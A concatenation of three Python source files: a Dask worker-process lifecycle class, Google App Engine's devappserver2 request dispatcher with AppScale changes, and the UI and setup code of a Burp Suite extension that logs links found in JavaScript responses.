        self.worker_start_args = worker_start_args
        self.on_exit = on_exit
        self.process = None
        self.Worker = worker

        # Initialized when worker is ready
        self.worker_dir = None
        self.worker_address = None

    @gen.coroutine
    def start(self):
        """
        Ensure the worker process is started.
        """
        enable_proctitle_on_children()

        if self.status == 'running':
            raise gen.Return(self.status)
        if self.status == 'starting':
            # Another caller is already starting it; wait for the outcome
            yield self.running.wait()
            raise gen.Return(self.status)

        self.init_result_q = init_q = mp_context.Queue()
        self.child_stop_q = mp_context.Queue()
        # Random uid distinguishes this start attempt from a stale child
        # writing to a previous queue
        uid = uuid.uuid4().hex

        self.process = AsyncProcess(
            target=self._run,
            kwargs=dict(worker_args=self.worker_args,
                        worker_kwargs=self.worker_kwargs,
                        worker_start_args=self.worker_start_args,
                        silence_logs=self.silence_logs,
                        init_result_q=self.init_result_q,
                        child_stop_q=self.child_stop_q,
                        uid=uid, Worker=self.Worker),
        )
        self.process.daemon = True
        self.process.set_exit_callback(self._on_exit)
        self.running = Event()
        self.stopped = Event()
        self.status = 'starting'
        yield self.process.start()
        msg = yield self._wait_until_connected(uid)
        if not msg:
            raise gen.Return(self.status)
        self.worker_address = msg['address']
        self.worker_dir = msg['dir']
        assert self.worker_address
        self.status = 'running'
        self.running.set()
        init_q.close()

        raise gen.Return(self.status)

    def _on_exit(self, proc):
        """Exit callback from AsyncProcess."""
        if proc is not self.process:
            # Ignore exit of old process instance
            return
        self.mark_stopped()

    def _death_message(self, pid, exitcode):
        """Return a human-readable description of a non-zero exit."""
        assert exitcode is not None
        if exitcode == 255:
            return "Worker process %d was killed by unknown signal" % (pid,)
        elif exitcode >= 0:
            return "Worker process %d exited with status %d" % (pid, exitcode,)
        else:
            return "Worker process %d was killed by signal %d" % (pid, -exitcode,)

    def is_alive(self):
        """Return True when a child process exists and is alive."""
        return self.process is not None and self.process.is_alive()

    @property
    def pid(self):
        """PID of the live child process, or None."""
        return (self.process.pid
                if self.process and self.process.is_alive()
                else None)

    def mark_stopped(self):
        """Record the child's death, release resources and fire on_exit."""
        if self.status != 'stopped':
            r = self.process.exitcode
            assert r is not None
            if r != 0:
                msg = self._death_message(self.process.pid, r)
                logger.warning(msg)
            self.status = 'stopped'
            self.stopped.set()
            # Release resources
            self.process.close()
            self.init_result_q = None
            self.child_stop_q = None
            self.process = None
            # Best effort to clean up worker directory
            if self.worker_dir and os.path.exists(self.worker_dir):
                shutil.rmtree(self.worker_dir, ignore_errors=True)
            self.worker_dir = None
            # User hook
            if self.on_exit is not None:
                self.on_exit(r)

    @gen.coroutine
    def kill(self, timeout=2, executor_wait=True):
        """
        Ensure the worker process is stopped, waiting at most
        *timeout* seconds before terminating it abruptly.
        """
        loop = IOLoop.current()
        deadline = loop.time() + timeout

        if self.status == 'stopped':
            return
        if self.status == 'stopping':
            yield self.stopped.wait()
            return
        assert self.status in ('starting', 'running')
        self.status = 'stopping'

        process = self.process
        # Ask the child to shut down cleanly within 80% of the deadline
        self.child_stop_q.put({
            'op': 'stop',
            'timeout': max(0, deadline - loop.time()) * 0.8,
            'executor_wait': executor_wait,
        })
        self.child_stop_q.close()

        while process.is_alive() and loop.time() < deadline:
            yield gen.sleep(0.05)

        if process.is_alive():
            logger.warning("Worker process still alive after %d seconds, killing",
                           timeout)
            try:
                yield process.terminate()
            except Exception as e:
                logger.error("Failed to kill worker process: %s", e)

    @gen.coroutine
    def _wait_until_connected(self, uid):
        """Poll init_result_q until the child reports success or failure."""
        delay = 0.05
        while True:
            if self.status != 'starting':
                return
            try:
                msg = self.init_result_q.get_nowait()
            except Empty:
                yield gen.sleep(delay)
                continue

            if msg['uid'] != uid:  # ensure that we didn't cross queues
                continue

            if 'exception' in msg:
                logger.error("Failed while trying to start worker process: %s",
                             msg['exception'])
                yield self.process.join()
                # Re-raise the child's startup exception. The previous code
                # did `raise msg`, which raised the dict itself and produced
                # a TypeError that masked the real failure
                raise msg['exception']
            else:
                raise gen.Return(msg)

    @classmethod
    def _run(cls, worker_args, worker_kwargs, worker_start_args,
             silence_logs, init_result_q, child_stop_q, uid, Worker):  # pragma: no cover
        """Child process entry point: run a Worker inside its own IOLoop."""
        try:
            from dask.multiprocessing import initialize_worker_process
        except ImportError:   # old Dask version
            pass
        else:
            initialize_worker_process()

        if silence_logs:
            logger.setLevel(silence_logs)

        IOLoop.clear_instance()
        loop = IOLoop()
        loop.make_current()
        worker = Worker(*worker_args, **worker_kwargs)

        @gen.coroutine
        def do_stop(timeout=5, executor_wait=True):
            try:
                yield worker._close(report=False,
                                    nanny=False,
                                    executor_wait=executor_wait,
                                    timeout=timeout)
            finally:
                loop.stop()

        def watch_stop_q():
            """
            Wait for an incoming stop message and then stop the
            worker cleanly.
            """
            while True:
                try:
                    msg = child_stop_q.get(timeout=1000)
                except Empty:
                    pass
                else:
                    child_stop_q.close()
                    assert msg.pop('op') == 'stop'
                    loop.add_callback(do_stop, **msg)
                    break

        t = threading.Thread(target=watch_stop_q, name="Nanny stop queue watch")
        t.daemon = True
        t.start()

        @gen.coroutine
        def run():
            """
            Try to start worker and inform parent of outcome.
            """
            try:
                yield worker._start(*worker_start_args)
            except Exception as e:
                logger.exception("Failed to start worker")
                init_result_q.put({'uid': uid, 'exception': e})
                init_result_q.close()
            else:
                assert worker.address
                init_result_q.put({'address': worker.address,
                                   'dir': worker.local_dir,
                                   'uid': uid})
                init_result_q.close()
                yield worker.wait_until_closed()
                logger.info("Worker closed")

        try:
            loop.run_sync(run)
        except TimeoutError:
            # Loop was stopped before wait_until_closed() returned, ignore
            pass
        except KeyboardInterrupt:
            pass
|
dispatcher.py | #!/usr/bin/env python
#
# Copyright 2007 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""Manage the lifecycle of modules and dispatch requests to them."""
import collections
import logging
import os
import threading
import time
import urlparse
import wsgiref.headers
from google.appengine.api import apiproxy_stub_map
from google.appengine.api import request_info
from google.appengine.tools.devappserver2 import constants
from google.appengine.tools.devappserver2 import instance
from google.appengine.tools.devappserver2 import scheduled_executor
from google.appengine.tools.devappserver2 import module
from google.appengine.tools.devappserver2 import start_response_utils
from google.appengine.tools.devappserver2 import thread_executor
from google.appengine.tools.devappserver2 import wsgi_server
# Shared executor used to run module lifecycle work on background threads
_THREAD_POOL = thread_executor.ThreadExecutor()

# Immutable (status, headers, content) triple describing an HTTP response
ResponseTuple = collections.namedtuple('ResponseTuple',
                                       ['status', 'headers', 'content'])
class PortRegistry(object):
  """Thread-safe registry mapping a port to the (module, instance) serving it."""

  def __init__(self):
    self._ports_lock = threading.RLock()
    self._ports = {}

  def add(self, port, _module, inst):
    """Associates *port* with the given module/instance pair."""
    entry = (_module, inst)
    with self._ports_lock:
      self._ports[port] = entry

  def get(self, port):
    """Returns the (module, instance) pair for *port*; raises KeyError if absent."""
    with self._ports_lock:
      return self._ports[port]
class Dispatcher(request_info.Dispatcher):
  """A devappserver2 implementation of request_info.Dispatcher.

  In addition to the request_info.Dispatcher interface, it owns modules and
  manages their lifetimes.
  """

  def __init__(self,
               configuration,
               host,
               port,
               auth_domain,
               runtime_stderr_loglevel,
               php_executable_path,
               enable_php_remote_debugging,
               python_config,
               cloud_sql_config,
               module_to_max_instances,
               use_mtime_file_watcher,
               automatic_restart,
               allow_skipped_files,
               module_to_threadsafe_override):
    """Initializer for Dispatcher.

    Args:
      configuration: An application_configuration.ApplicationConfiguration
          instance storing the configuration data for the app.
      host: A string containing the host that any HTTP servers should bind to
          e.g. "localhost".
      port: An int specifying the first port where servers should listen.
      auth_domain: A string containing the auth domain to set in the
          environment variables.
      runtime_stderr_loglevel: An int representing the minimum logging level
          at which runtime log messages should be written to stderr. See
          devappserver2.py for possible values.
      php_executable_path: A string containing the path to PHP execution e.g.
          "/usr/bin/php-cgi".
      enable_php_remote_debugging: A boolean indicating whether the PHP
          interpreter should be started with XDebug remote debugging enabled.
      python_config: A runtime_config_pb2.PythonConfig instance containing
          Python runtime-specific configuration. If None then defaults are
          used.
      cloud_sql_config: A runtime_config_pb2.CloudSQL instance containing the
          required configuration for local Google Cloud SQL development. If
          None then Cloud SQL will not be available.
      module_to_max_instances: A mapping between a module name and the maximum
          number of instances that can be created (this overrides the settings
          found in the configuration argument) e.g.
          {'default': 10, 'backend': 15}.
      use_mtime_file_watcher: A bool containing whether to use mtime polling
          to monitor file changes even if other options are available on the
          current platform.
      automatic_restart: If True then instances will be restarted when a
          file or configuration change that affects them is detected.
      allow_skipped_files: If True then all files in the application's
          directory are readable, even if they appear in a static handler or
          "skip_files" directive.
      module_to_threadsafe_override: A mapping between the module name and
          what to override the module's YAML threadsafe configuration (so
          modules not named continue to use their YAML configuration).
    """
    self._configuration = configuration
    self._php_executable_path = php_executable_path
    self._enable_php_remote_debugging = enable_php_remote_debugging
    self._python_config = python_config
    self._cloud_sql_config = cloud_sql_config
    # _request_data and _api_port are supplied later, in start().
    self._request_data = None
    self._api_port = None
    self._running_modules = []
    self._module_configurations = {}
    self._host = host
    self._port = port
    self._auth_domain = auth_domain
    self._runtime_stderr_loglevel = runtime_stderr_loglevel
    self._module_name_to_module = {}
    self._dispatch_server = None
    self._quit_event = threading.Event()  # Set when quit() has been called.
    # Background thread that periodically reloads dispatch.yaml; only
    # started (in start()) when the configuration has a dispatch file.
    self._update_checking_thread = threading.Thread(
        target=self._loop_checking_for_updates)
    self._module_to_max_instances = module_to_max_instances or {}
    self._use_mtime_file_watcher = use_mtime_file_watcher
    self._automatic_restart = automatic_restart
    self._allow_skipped_files = allow_skipped_files
    self._module_to_threadsafe_override = module_to_threadsafe_override
    self._executor = scheduled_executor.ScheduledExecutor(_THREAD_POOL)
    self._port_registry = PortRegistry()

  def start(self, api_port, request_data):
    """Starts the configured modules.

    Args:
      api_port: The port that APIServer listens for RPC requests on.
      request_data: A wsgi_request_info.WSGIRequestInfo that will be provided
          with request information for use by API stubs.
    """
    self._api_port = api_port
    self._request_data = request_data
    port = self._port
    self._executor.start()
    if self._configuration.dispatch:
      # The dispatcher itself serves HTTP on the first port; modules are
      # then offset by 100 below (and by 1000 each in _create_module).
      self._dispatch_server = wsgi_server.WsgiServer((self._host, port), self)
      self._dispatch_server.start()
      logging.info('Starting dispatcher running at: http://%s:%s', self._host,
                   self._dispatch_server.port)
      self._update_checking_thread.start()
      if port:
        port += 100
      # No module/instance: this port belongs to the dispatcher itself.
      self._port_registry.add(self._dispatch_server.port, None, None)
    for module_configuration in self._configuration.modules:
      self._module_configurations[
          module_configuration.module_name] = module_configuration
      _module, port = self._create_module(module_configuration, port)
      _module.start()
      self._module_name_to_module[module_configuration.module_name] = _module
      logging.info('Starting module "%s" running at: http://%s',
                   module_configuration.module_name, _module.balanced_address)

  @property
  def dispatch_port(self):
    """The port that the dispatch HTTP server for the Module is listening on."""
    assert self._dispatch_server, 'dispatch server not running'
    assert self._dispatch_server.ready, 'dispatch server not ready'
    return self._dispatch_server.port

  @property
  def host(self):
    """The host that the HTTP server for this Dispatcher is listening on."""
    return self._host

  @property
  def dispatch_address(self):
    """The address of the dispatch HTTP server e.g. "localhost:8080"."""
    if self.dispatch_port != 80:
      return '%s:%s' % (self.host, self.dispatch_port)
    else:
      return self.host

  def _check_for_updates(self):
    # Re-reads dispatch.yaml so routing rule changes take effect live.
    self._configuration.dispatch.check_for_updates()

  def _loop_checking_for_updates(self):
    """Loops until the Dispatcher exits, reloading dispatch.yaml config."""
    while not self._quit_event.is_set():
      self._check_for_updates()
      self._quit_event.wait(timeout=1)

  def quit(self):
    """Quits all modules."""
    self._executor.quit()
    self._quit_event.set()
    if self._dispatch_server:
      self._dispatch_server.quit()
    # AppScale: Prevent instances from serving new requests.
    for _module in self._module_name_to_module.values():
      with _module.graceful_shutdown_lock:
        _module.sigterm_sent = True
    logging.info('Waiting for instances to finish serving requests')
    # Poll in-flight request counts until they drain or the deadline passes.
    deadline = time.time() + constants.MAX_INSTANCE_RESPONSE_TIME
    while True:
      if time.time() > deadline:
        logging.error('Request timeout while shutting down')
        break
      requests_in_progress = False
      for _module in self._module_name_to_module.values():
        with _module.graceful_shutdown_lock:
          if _module.request_count > 0:
            requests_in_progress = True
      if not requests_in_progress:
        # All requests drained: flush the request logger before quitting.
        logservice = apiproxy_stub_map.apiproxy.GetStub('logservice')
        if logservice.is_elk_enabled:
          logging.info('Waiting for Request Logger to finish.')
          logservice.stop_requests_logger()
          while logservice.is_requests_logger_alive():
            time.sleep(.5)
          logging.info('Request Logger has finished.')
        break
      time.sleep(.5)
    # End AppScale
    for _module in self._module_name_to_module.values():
      _module.quit()

  def _create_module(self, module_configuration, port):
    """Builds the Module subclass matching the configured scaling type.

    Returns:
      A tuple (_module, next_port) where next_port is the port the next
      module should use (offset by 1000, or 0 for "pick any free port").
    """
    max_instances = self._module_to_max_instances.get(
        module_configuration.module_name)
    threadsafe_override = self._module_to_threadsafe_override.get(
        module_configuration.module_name)
    module_args = (module_configuration,
                   self._host,
                   port,
                   self._api_port,
                   self._auth_domain,
                   self._runtime_stderr_loglevel,
                   self._php_executable_path,
                   self._enable_php_remote_debugging,
                   self._python_config,
                   self._cloud_sql_config,
                   self._port,
                   self._port_registry,
                   self._request_data,
                   self,
                   max_instances,
                   self._use_mtime_file_watcher,
                   self._automatic_restart,
                   self._allow_skipped_files,
                   threadsafe_override)
    if module_configuration.manual_scaling:
      _module = module.ManualScalingModule(*module_args)
    elif module_configuration.basic_scaling:
      _module = module.BasicScalingModule(*module_args)
    else:
      _module = module.AutoScalingModule(*module_args)
    if port != 0:
      # Leave room for each module's instances; port 0 means auto-assign.
      port += 1000
    return _module, port

  @property
  def modules(self):
    return self._module_name_to_module.values()

  def get_hostname(self, module_name, version, instance_id=None):
    """Returns the hostname for a (module, version, instance_id) tuple.

    If instance_id is set, this will return a hostname for that particular
    instance. Otherwise, it will return the hostname for load-balancing.

    Args:
      module_name: A str containing the name of the module.
      version: A str containing the version.
      instance_id: An optional str containing the instance ID.

    Returns:
      A str containing the hostname.

    Raises:
      request_info.ModuleDoesNotExistError: The module does not exist.
      request_info.VersionDoesNotExistError: The version does not exist.
      request_info.InvalidInstanceIdError: The instance ID is not valid for
          the module/version or the module/version uses automatic scaling.
    """
    _module = self._get_module(module_name, version)
    if instance_id is None:
      return _module.balanced_address
    else:
      return _module.get_instance_address(instance_id)

  def get_module_names(self):
    """Returns a list of module names."""
    return list(self._module_name_to_module)

  def get_module_by_name(self, _module):
    """Returns the module with the given name.

    Args:
      _module: A str containing the name of the module.

    Returns:
      The module.Module with the provided name.

    Raises:
      request_info.ModuleDoesNotExistError: The module does not exist.
    """
    try:
      return self._module_name_to_module[_module]
    except KeyError:
      raise request_info.ModuleDoesNotExistError(_module)

  def get_versions(self, _module):
    """Returns a list of versions for a module.

    Args:
      _module: A str containing the name of the module.

    Returns:
      A list of str containing the versions for the specified module.

    Raises:
      request_info.ModuleDoesNotExistError: The module does not exist.
    """
    # Only a single (major) version per module is supported locally.
    if _module in self._module_configurations:
      return [self._module_configurations[_module].major_version]
    else:
      raise request_info.ModuleDoesNotExistError(_module)

  def get_default_version(self, _module):
    """Returns the default version for a module.

    Args:
      _module: A str containing the name of the module.

    Returns:
      A str containing the default version for the specified module.

    Raises:
      request_info.ModuleDoesNotExistError: The module does not exist.
    """
    if _module in self._module_configurations:
      return self._module_configurations[_module].major_version
    else:
      raise request_info.ModuleDoesNotExistError(_module)

  def add_event(self, runnable, eta, service=None, event_id=None):
    """Add a callable to be run at the specified time.

    Args:
      runnable: A callable object to call at the specified time.
      eta: An int containing the time to run the event, in seconds since the
          epoch.
      service: A str containing the name of the service that owns this event.
          This should be set if event_id is set.
      event_id: A str containing the id of the event. If set, this can be
          passed to update_event to change the time at which the event
          should run.
    """
    if service is not None and event_id is not None:
      key = (service, event_id)
    else:
      key = None
    self._executor.add_event(runnable, eta, key)

  def update_event(self, eta, service, event_id):
    """Update the eta of a scheduled event.

    Args:
      eta: An int containing the time to run the event, in seconds since the
          epoch.
      service: A str containing the name of the service that owns this event.
      event_id: A str containing the id of the event to update.
    """
    self._executor.update_event(eta, (service, event_id))

  def _get_module(self, module_name, version):
    """Resolves (module_name, version) to a module.Module.

    Falls back to the 'default' module, then to any module, when the name is
    missing or unknown.

    Raises:
      request_info.ModuleDoesNotExistError: no module can be resolved.
      request_info.VersionDoesNotExistError: the version does not match the
          module's configured major version.
    """
    if not module_name or module_name not in self._module_name_to_module:
      if 'default' in self._module_name_to_module:
        module_name = 'default'
      elif self._module_name_to_module:
        # If there is no default module, but there are other modules, take
        # any. This is somewhat of a hack, and can be removed if we ever
        # enforce the existence of a default module.
        # NOTE(review): .keys()[0] is Python 2-only (dict views are not
        # subscriptable in Python 3); this file targets Python 2.
        module_name = self._module_name_to_module.keys()[0]
      else:
        raise request_info.ModuleDoesNotExistError(module_name)
    elif (version is not None and
          version != self._module_configurations[module_name].major_version):
      raise request_info.VersionDoesNotExistError()
    return self._module_name_to_module[module_name]

  def set_num_instances(self, module_name, version, num_instances):
    """Sets the number of instances to run for a version of a module.

    Args:
      module_name: A str containing the name of the module.
      version: A str containing the version.
      num_instances: An int containing the number of instances to run.

    Raises:
      ModuleDoesNotExistError: The module does not exist.
      VersionDoesNotExistError: The version does not exist.
      NotSupportedWithAutoScalingError: The provided module/version uses
          automatic scaling.
    """
    self._get_module(module_name, version).set_num_instances(num_instances)

  def get_num_instances(self, module_name, version):
    """Returns the number of instances running for a version of a module.

    Returns:
      An int containing the number of instances running for a module version.

    Args:
      module_name: A str containing the name of the module.
      version: A str containing the version.

    Raises:
      ModuleDoesNotExistError: The module does not exist.
      VersionDoesNotExistError: The version does not exist.
      NotSupportedWithAutoScalingError: The provided module/version uses
          automatic scaling.
    """
    return self._get_module(module_name, version).get_num_instances()

  def start_module(self, module_name, version):
    """Starts a module.

    Args:
      module_name: A str containing the name of the module.
      version: A str containing the version.

    Raises:
      ModuleDoesNotExistError: The module does not exist.
      VersionDoesNotExistError: The version does not exist.
      NotSupportedWithAutoScalingError: The provided module/version uses
          automatic scaling.
    """
    self._get_module(module_name, version).resume()

  def stop_module(self, module_name, version):
    """Stops a module.

    Args:
      module_name: A str containing the name of the module.
      version: A str containing the version.

    Raises:
      ModuleDoesNotExistError: The module does not exist.
      VersionDoesNotExistError: The version does not exist.
      NotSupportedWithAutoScalingError: The provided module/version uses
          automatic scaling.
    """
    self._get_module(module_name, version).suspend()

  def send_background_request(self, module_name, version, inst,
                              background_request_id):
    """Dispatch a background thread request.

    Args:
      module_name: A str containing the module name to service this
          request.
      version: A str containing the version to service this request.
      inst: The instance to service this request.
      background_request_id: A str containing the unique background thread
          request identifier.

    Raises:
      NotSupportedWithAutoScalingError: The provided module/version uses
          automatic scaling.
      BackgroundThreadLimitReachedError: The instance is at its background
          thread capacity.
    """
    _module = self._get_module(module_name, version)
    try:
      inst.reserve_background_thread()
    except instance.CannotAcceptRequests:
      raise request_info.BackgroundThreadLimitReachedError()
    port = _module.get_instance_port(inst.instance_id)
    environ = _module.build_request_environ(
        'GET', '/_ah/background',
        [('X-AppEngine-BackgroundRequest', background_request_id)],
        '', '0.1.0.3', port)
    # Handled asynchronously; errors are logged rather than raised.
    _THREAD_POOL.submit(self._handle_request,
                        environ,
                        start_response_utils.null_start_response,
                        _module,
                        inst,
                        request_type=instance.BACKGROUND_REQUEST,
                        catch_and_log_exceptions=True)

  # TODO: Think of better names for add_async_request and
  # add_request.
  def add_async_request(self, method, relative_url, headers, body, source_ip,
                        module_name=None, version=None, instance_id=None):
    """Dispatch an HTTP request asynchronously.

    Args:
      method: A str containing the HTTP method of the request.
      relative_url: A str containing path and query string of the request.
      headers: A list of (key, value) tuples where key and value are both str.
      body: A str containing the request body.
      source_ip: The source ip address for the request.
      module_name: An optional str containing the module name to service this
          request. If unset, the request will be dispatched to the default
          module.
      version: An optional str containing the version to service this request.
          If unset, the request will be dispatched to the default version.
      instance_id: An optional str containing the instance_id of the instance
          to service this request. If unset, the request will be dispatched
          according to the load-balancing for the module and version.
    """
    if module_name:
      _module = self._get_module(module_name, version)
    else:
      # Route by path using the dispatch rules.
      _module = self._module_for_request(urlparse.urlsplit(relative_url).path)
    inst = _module.get_instance(instance_id) if instance_id else None
    port = _module.get_instance_port(instance_id) if instance_id else (
        _module.balanced_port)
    environ = _module.build_request_environ(method, relative_url, headers, body,
                                            source_ip, port)
    _THREAD_POOL.submit(self._handle_request,
                        environ,
                        start_response_utils.null_start_response,
                        _module,
                        inst,
                        catch_and_log_exceptions=True)

  def add_request(self, method, relative_url, headers, body, source_ip,
                  module_name=None, version=None, instance_id=None,
                  fake_login=False):
    """Process an HTTP request.

    Args:
      method: A str containing the HTTP method of the request.
      relative_url: A str containing path and query string of the request.
      headers: A list of (key, value) tuples where key and value are both str.
      body: A str containing the request body.
      source_ip: The source ip address for the request.
      module_name: An optional str containing the module name to service this
          request. If unset, the request will be dispatched according to the
          host header and relative_url.
      version: An optional str containing the version to service this request.
          If unset, the request will be dispatched according to the host
          header and relative_url.
      instance_id: An optional str containing the instance_id of the instance
          to service this request. If unset, the request will be dispatched
          according to the host header and relative_url and, if applicable,
          the load-balancing for the module and version.
      fake_login: A bool indicating whether login checks should be bypassed,
          i.e. "login: required" should be ignored for this request.

    Returns:
      A request_info.ResponseTuple containing the response information for the
      HTTP request.
    """
    if module_name:
      _module = self._get_module(module_name, version)
      inst = _module.get_instance(instance_id) if instance_id else None
    else:
      headers_dict = wsgiref.headers.Headers(headers)
      _module, inst = self._resolve_target(
          headers_dict['Host'], urlparse.urlsplit(relative_url).path)
    if inst:
      try:
        port = _module.get_instance_port(inst.instance_id)
      except request_info.NotSupportedWithAutoScalingError:
        # Auto-scaled modules have no per-instance port; load-balance.
        port = _module.balanced_port
    else:
      port = _module.balanced_port
    environ = _module.build_request_environ(method, relative_url, headers, body,
                                            source_ip, port,
                                            fake_login=fake_login)
    # Capture the WSGI status/headers so they can be returned synchronously.
    start_response = start_response_utils.CapturingStartResponse()
    response = self._handle_request(environ,
                                    start_response,
                                    _module,
                                    inst)
    return request_info.ResponseTuple(start_response.status,
                                      start_response.response_headers,
                                      start_response.merged_response(response))

  def _resolve_target(self, hostname, path):
    """Returns the module and instance that should handle this request.

    Args:
      hostname: A string containing the value of the host header in the
          request or None if one was not present.
      path: A string containing the path of the request.

    Returns:
      A tuple (_module, inst) where:
        _module: The module.Module that should handle this request.
        inst: The instance.Instance that should handle this request or None
            if the module's load balancing should decide on the instance.

    Raises:
      request_info.ModuleDoesNotExistError: if hostname is not known.
    """
    if self._port == 80:
      default_address = self.host
    else:
      default_address = '%s:%s' % (self.host, self._port)
    if not hostname or hostname == default_address:
      return self._module_for_request(path), None

    default_address_offset = hostname.find(default_address)
    if default_address_offset > 0:
      # Hostname looks like "<prefix>.<default_address>": treat the prefix
      # as a module name.
      prefix = hostname[:default_address_offset - 1]
      if '.' in prefix:
        raise request_info.ModuleDoesNotExistError(prefix)
      return self._get_module(prefix, None), None
    else:
      # AppScale: resolve via the port this process is serving on.
      port = int(os.environ['MY_PORT'])
      try:
        _module, inst = self._port_registry.get(port)
      except KeyError:
        raise request_info.ModuleDoesNotExistError(hostname)
      if not _module:
        _module = self._module_for_request(path)
      return _module, inst

  def _handle_request(self, environ, start_response, _module,
                      inst=None, request_type=instance.NORMAL_REQUEST,
                      catch_and_log_exceptions=False):
    """Dispatch a WSGI request.

    Args:
      environ: An environ dict for the request as defined in PEP-333.
      start_response: A function with semantics defined in PEP-333.
      _module: The module to dispatch this request to.
      inst: The instance to service this request. If None, the module will
          be left to choose the instance to serve this request.
      request_type: The request_type of this request. See instance.*_REQUEST
          module constants.
      catch_and_log_exceptions: A bool containing whether to catch and log
          exceptions in handling the request instead of leaving it for the
          caller to handle.

    Returns:
      An iterable over the response to the request as defined in PEP-333.
    """
    try:
      return _module._handle_request(environ, start_response, inst=inst,
                                     request_type=request_type)
    except:
      # Bare except is deliberate: async callers (see _THREAD_POOL.submit)
      # have no one to propagate to, so the error is logged instead.
      if catch_and_log_exceptions:
        logging.exception('Internal error while handling request.')
      else:
        raise

  def __call__(self, environ, start_response):
    # WSGI entry point for the dispatch server itself: route by path.
    return self._handle_request(
        environ, start_response, self._module_for_request(environ['PATH_INFO']))

  def _module_for_request(self, path):
    """Returns the module whose dispatch rule matches *path* (or default)."""
    dispatch = self._configuration.dispatch
    if dispatch:
      for url, module_name in dispatch.dispatch:
        if (url.path_exact and path == url.path or
            not url.path_exact and path.startswith(url.path)):
          return self._get_module(module_name, None)
    return self._get_module(None, None)
|
FransLinkfinder.py | #
# BurpLinkFinder - Find links within JS files.
#
# Copyright (c) 2019 Frans Hendrik Botes
# Credit to https://github.com/GerbenJavado/LinkFinder for the idea and regex
#
from burp import IBurpExtender, IScannerCheck, IScanIssue, ITab
from java.io import PrintWriter
from java.net import URL
from java.util import ArrayList, List
from java.util.regex import Matcher, Pattern
import binascii
import base64
import re
from javax import swing
from java.awt import Font, Color
from threading import Thread
from array import array
from java.awt import EventQueue
from java.lang import Runnable
from thread import start_new_thread
from javax.swing import JFileChooser
from urlparse import urlparse
# Using the Runnable class for thread-safety with Swing
class Run(Runnable):
    """Adapt a plain Python callable to java.lang.Runnable.

    Used to hand work to the Swing event dispatch thread via
    EventQueue.invokeLater for thread-safe UI updates.
    """

    def __init__(self, runner):
        # Zero-argument callable to invoke when the event queue runs us.
        self._callback = runner

    def run(self):
        # Called by the Java event queue on the EDT.
        self._callback()
# Needed params
class BurpExtender(IBurpExtender, IScannerCheck, ITab):
    """Burp extension that passively scans JS responses for embedded links.

    Registers itself as a passive scanner check and adds a "BurpJSLinkFinder"
    suite tab that logs every link discovered in JavaScript files.
    """

    def registerExtenderCallbacks(self, callbacks):
        # Entry point called by Burp when the extension is loaded.
        self.callbacks = callbacks
        self.helpers = callbacks.getHelpers()
        callbacks.setExtensionName("BurpJSLinkFinder")
        callbacks.issueAlert("BurpJSLinkFinder Passive Scanner enabled")
        # Wire stdout/stderr to Burp's extension output streams.
        self.stdout = PrintWriter(callbacks.getStdout(), True)
        self.stderr = PrintWriter(callbacks.getStderr(), True)
        callbacks.registerScannerCheck(self)
        self.initUI()
        self.callbacks.addSuiteTab(self)
        print ("Burp JS LinkFinder loaded.")
        print ("Copyright (c) 2019 Frans Hendrik Botes")
        self.outputTxtArea.setText("Burp JS LinkFinder loaded." + "\n" + "Copyright (c) 2019 Frans Hendrik Botes" + "\n")
        # Comma-separated substrings used to skip common JS files.
        self.dynamicExclusionList = None
        # Remember the last seen Origin/Referer so discovered relative links
        # can be resolved against a plausible base URL.
        self.lastKnownOrigin = ''
        self.lastKnownReferer = ''
        self.load_config()

    def initUI(self):
        """Build the Swing UI shown in the extension's suite tab."""
        self.tab = swing.JPanel()
        # UI for Output
        self.outputLabel = swing.JLabel("LinkFinder Log:")
        self.outputLabel.setFont(Font("Tahoma", Font.BOLD, 14))
        self.outputLabel.setForeground(Color(255,102,52))
        self.logPane = swing.JScrollPane()
        self.outputTxtArea = swing.JTextArea()
        self.outputTxtArea.setFont(Font("Consolas", Font.PLAIN, 12))
        self.outputTxtArea.setLineWrap(True)
        self.logPane.setViewportView(self.outputTxtArea)
        self.clearBtn = swing.JButton("Clear Log", actionPerformed=self.clearLog)
        self.exportBtn = swing.JButton("Export Log", actionPerformed=self.exportLog)
        self.parentFrm = swing.JFileChooser()
        self.exclusionLabel = swing.JLabel("Exclusion list (separated by by comma):")
        # Persist the exclusion list whenever the field loses focus.
        self.exclusionInput = swing.JTextField(focusLost=self.save_config)
        # Layout
        layout = swing.GroupLayout(self.tab)
        layout.setAutoCreateGaps(True)
        layout.setAutoCreateContainerGaps(True)
        self.tab.setLayout(layout)
        layout.setHorizontalGroup(
            layout.createParallelGroup()
            .addGroup(layout.createSequentialGroup()
                .addGroup(layout.createParallelGroup()
                    .addComponent(self.exclusionLabel)
                    .addComponent(self.exclusionInput)
                    .addComponent(self.outputLabel)
                    .addComponent(self.logPane)
                    .addComponent(self.clearBtn)
                    .addComponent(self.exportBtn)
                )
            )
        )
        layout.setVerticalGroup(
            layout.createParallelGroup()
            .addGroup(layout.createParallelGroup()
                .addGroup(layout.createSequentialGroup()
                    .addComponent(self.exclusionLabel)
                    .addComponent(self.exclusionInput)
                    .addComponent(self.outputLabel)
                    .addComponent(self.logPane)
                    .addComponent(self.clearBtn)
                    .addComponent(self.exportBtn)
                )
            )
        )

    def getTabCaption(self):
        # ITab: title shown on the Burp suite tab.
        return "BurpJSLinkFinder"

    def getUiComponent(self):
        # ITab: root Swing component for the tab.
        return self.tab

    def clearLog(self, event):
        # Button handler: reset the log area to its startup banner.
        self.outputTxtArea.setText("Burp JS LinkFinder loaded." + "\n" + "Copyright (c) 2019 Frans Hendrik Botes" + "\n" )

    def exportLog(self, event):
        # Button handler: write the current log text to a user-chosen file.
        chooseFile = JFileChooser()
        ret = chooseFile.showDialog(self.logPane, "Choose file")
        filename = chooseFile.getSelectedFile().getCanonicalPath()
        print("\n" + "Export to : " + filename)
        # NOTE(review): open(..., 'w', 0) (unbuffered text write) is
        # Python 2/Jython-specific.
        open(filename, 'w', 0).write(self.outputTxtArea.text)

    def save_config(self, event):
        # Persist the exclusion list in Burp's extension settings store.
        self.dynamicExclusionList = self.exclusionInput.getText().strip()
        self.callbacks.saveExtensionSetting('exclusion_list', self.exclusionInput.getText().strip())

    def load_config(self):
        # Restore the exclusion list saved by save_config (empty if unset).
